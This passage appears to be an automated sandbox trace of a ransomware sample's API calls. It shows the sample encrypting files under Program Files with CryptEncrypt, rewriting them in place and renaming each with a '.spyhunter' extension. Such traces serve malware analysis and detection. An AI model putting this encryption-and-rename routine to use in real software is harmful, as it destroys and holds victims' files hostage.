(x86)\\Java\\jre7\\lib\\zi\\HST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\HST.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\hst.spyhunter")) returned 1 [0127.908] GetProcessHeap () returned 0x2c0000 [0127.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.908] GetProcessHeap () returned 0x2c0000 [0127.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.908] GetProcessHeap () returned 0x2c0000 [0127.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33db28 | out: hHeap=0x2c0000) returned 1 [0127.908] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf710 | out: pbBuffer=0x25cf710) returned 1 [0127.908] GetProcessHeap () returned 0x2c0000 [0127.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.908] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf708*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf708*=0x30) returned 1 [0127.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.909] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT") returned 47 [0127.909] StrStrW (lpFirst="GMT", lpSrch=".txt") returned 0x0 [0127.909] GetProcessHeap () returned 0x2c0000 [0127.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.909] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6cc*=0x1b, lpOverlapped=0x0) returned 1 [0127.910] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.910] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6cc*=0x1b, lpOverlapped=0x0) returned 1 [0127.910] GetProcessHeap () returned 0x2c0000 [0127.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.910] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.910] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf70c*, lpNumberOfBytesWritten=0x25cf6cc*=0x4, lpOverlapped=0x0) returned 1 [0127.910] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6cc*=0x30, lpOverlapped=0x0) returned 1 [0127.910] CloseHandle (hObject=0x17c) returned 1 [0127.910] GetProcessHeap () returned 0x2c0000 [0127.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.910] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT.spyhunter") returned 57 [0127.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt.spyhunter")) returned 1 [0127.911] GetProcessHeap () returned 0x2c0000 [0127.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.911] GetProcessHeap () returned 0x2c0000 [0127.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.911] GetProcessHeap () returned 0x2c0000 [0127.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33da80 | out: hHeap=0x2c0000) returned 1 [0127.913] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf708 | out: pbBuffer=0x25cf708) returned 1 [0127.913] GetProcessHeap () returned 0x2c0000 [0127.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.913] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf700*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf700*=0x30) returned 1 [0127.913] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.916] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich") returned 57 [0127.916] StrStrW (lpFirst="Zurich", lpSrch=".txt") returned 0x0 [0127.916] GetProcessHeap () returned 0x2c0000 [0127.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.916] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6c4*=0x410, lpOverlapped=0x0) returned 1 [0127.959] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.959] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x25cf6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6c4*=0x410, lpOverlapped=0x0) returned 1 [0127.959] GetProcessHeap () returned 0x2c0000 [0127.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.959] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.959] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf704*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf704*, lpNumberOfBytesWritten=0x25cf6c4*=0x4, lpOverlapped=0x0) returned 1 [0127.959] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6c4*=0x30, lpOverlapped=0x0) returned 1 [0127.959] CloseHandle (hObject=0x17c) returned 1 [0127.959] GetProcessHeap () returned 0x2c0000 [0127.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.959] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich.spyhunter") returned 67 [0127.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich.spyhunter")) returned 1 [0127.960] GetProcessHeap () returned 0x2c0000 [0127.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.960] GetProcessHeap () returned 0x2c0000 [0127.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0127.960] GetProcessHeap () returned 0x2c0000 [0127.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2ec0 | out: hHeap=0x2c0000) returned 1 [0127.960] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf700 | out: pbBuffer=0x25cf700) returned 1 [0127.960] GetProcessHeap () returned 0x2c0000 [0127.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0127.960] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6f8*=0x30) returned 1 [0127.960] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0128.078] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd") returned 60 [0128.078] StrStrW (lpFirst="Volgograd", lpSrch=".txt") returned 0x0 [0128.078] GetProcessHeap () returned 0x2c0000 [0128.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.079] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6bc*=0x235, lpOverlapped=0x0) returned 1 [0128.079] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffdcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.079] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x235, lpNumberOfBytesWritten=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6bc*=0x235, lpOverlapped=0x0) returned 1 [0128.080] GetProcessHeap () returned 0x2c0000 [0128.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.080] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.080] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf6fc*, lpNumberOfBytesWritten=0x25cf6bc*=0x4, lpOverlapped=0x0) returned 1 [0128.080] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6bc*=0x30, lpOverlapped=0x0) returned 1 [0128.080] CloseHandle (hObject=0x17c) returned 1 [0128.080] GetProcessHeap () returned 0x2c0000 [0128.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0128.080] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd.spyhunter") returned 70 [0128.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd.spyhunter")) returned 1 [0128.081] GetProcessHeap () returned 0x2c0000 [0128.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0128.081] GetProcessHeap () returned 0x2c0000 [0128.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0128.081] GetProcessHeap () returned 0x2c0000 [0128.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc370 | out: hHeap=0x2c0000) returned 1 [0128.081] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf700 | out: pbBuffer=0x25cf700) returned 1 [0128.082] GetProcessHeap () returned 0x2c0000 [0128.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0128.082] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6f8*=0x30) returned 1 [0128.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0128.082] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT") returned 51 [0128.082] StrStrW (lpFirst="MST7MDT", lpSrch=".txt") returned 0x0 [0128.082] GetProcessHeap () returned 0x2c0000 [0128.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.082] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6bc*=0x4f8, lpOverlapped=0x0) returned 1 [0128.202] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffb08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.202] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4f8, lpNumberOfBytesWritten=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6bc*=0x4f8, lpOverlapped=0x0) returned 1 [0128.304] GetProcessHeap () returned 0x2c0000 [0128.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.304] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.304] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf6fc*, lpNumberOfBytesWritten=0x25cf6bc*=0x4, lpOverlapped=0x0) returned 1 [0128.304] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6bc*=0x30, lpOverlapped=0x0) returned 1 [0128.305] CloseHandle (hObject=0x17c) returned 1 [0128.305] GetProcessHeap () returned 0x2c0000 [0128.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0128.305] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.spyhunter") returned 61 [0128.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt.spyhunter")) returned 1 [0128.305] GetProcessHeap () returned 0x2c0000 [0128.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0128.305] GetProcessHeap () returned 0x2c0000 [0128.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0128.306] GetProcessHeap () returned 0x2c0000 [0128.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe670 | out: hHeap=0x2c0000) returned 1 [0128.307] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6f8 | out: pbBuffer=0x25cf6f8) returned 1 [0128.307] GetProcessHeap () returned 0x2c0000 [0128.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0128.307] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6f0*=0x30) returned 1 [0128.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0128.307] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll") returned 136 [0128.307] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Project.dll", lpSrch=".txt") returned 0x0 [0128.307] GetProcessHeap () returned 0x2c0000 [0128.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.307] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6b4*=0x2800, lpOverlapped=0x0) returned 1 [0128.373] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.373] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6b4*=0x2800, lpOverlapped=0x0) returned 1 [0128.373] GetProcessHeap () returned 0x2c0000 [0128.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.374] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.374] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf6f4*, lpNumberOfBytesWritten=0x25cf6b4*=0x4, lpOverlapped=0x0) returned 1 [0128.375] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6b4*=0x30, lpOverlapped=0x0) returned 1 [0128.375] CloseHandle (hObject=0x17c) returned 1 [0128.375] GetProcessHeap () returned 0x2c0000 [0128.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0128.375] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.spyhunter") returned 146 [0128.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll.spyhunter")) returned 1 [0128.461] GetProcessHeap () returned 0x2c0000 [0128.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0128.461] GetProcessHeap () returned 0x2c0000 [0128.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0128.461] GetProcessHeap () returned 0x2c0000 [0128.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3359a0 | out: hHeap=0x2c0000) returned 1 [0128.463] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6f0 | out: pbBuffer=0x25cf6f0) returned 1 [0128.463] GetProcessHeap () returned 0x2c0000 [0128.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0128.463] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6e8*=0x30) returned 1 [0128.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\xul.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0128.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll") returned 50 [0128.464] StrStrW (lpFirst="xul.dll", lpSrch=".txt") returned 0x0 [0128.464] GetProcessHeap () returned 0x2c0000 [0128.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.464] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6ac*=0x2800, lpOverlapped=0x0) returned 1 [0128.490] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.491] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6ac*=0x2800, lpOverlapped=0x0) returned 1 [0128.491] GetProcessHeap () returned 0x2c0000 [0128.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.491] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.491] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf6ec*, lpNumberOfBytesWritten=0x25cf6ac*=0x4, lpOverlapped=0x0) returned 1 [0128.492] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6ac*=0x30, lpOverlapped=0x0) returned 1 [0128.492] CloseHandle (hObject=0x17c) returned 1 [0128.492] GetProcessHeap () returned 0x2c0000 [0128.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0128.492] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll.spyhunter") returned 60 [0128.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\xul.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\xul.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\xul.dll.spyhunter")) returned 1 [0128.493] GetProcessHeap () returned 0x2c0000 [0128.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0128.493] GetProcessHeap () returned 0x2c0000 [0128.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0128.493] GetProcessHeap () returned 0x2c0000 [0128.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe9e0 | out: hHeap=0x2c0000) returned 1 [0128.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6e8 | out: pbBuffer=0x25cf6e8) returned 1 [0128.493] GetProcessHeap () returned 0x2c0000 [0128.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0128.494] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6e0*=0x30) returned 1 [0128.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe"), dwDesiredAccess=0xc0000000, 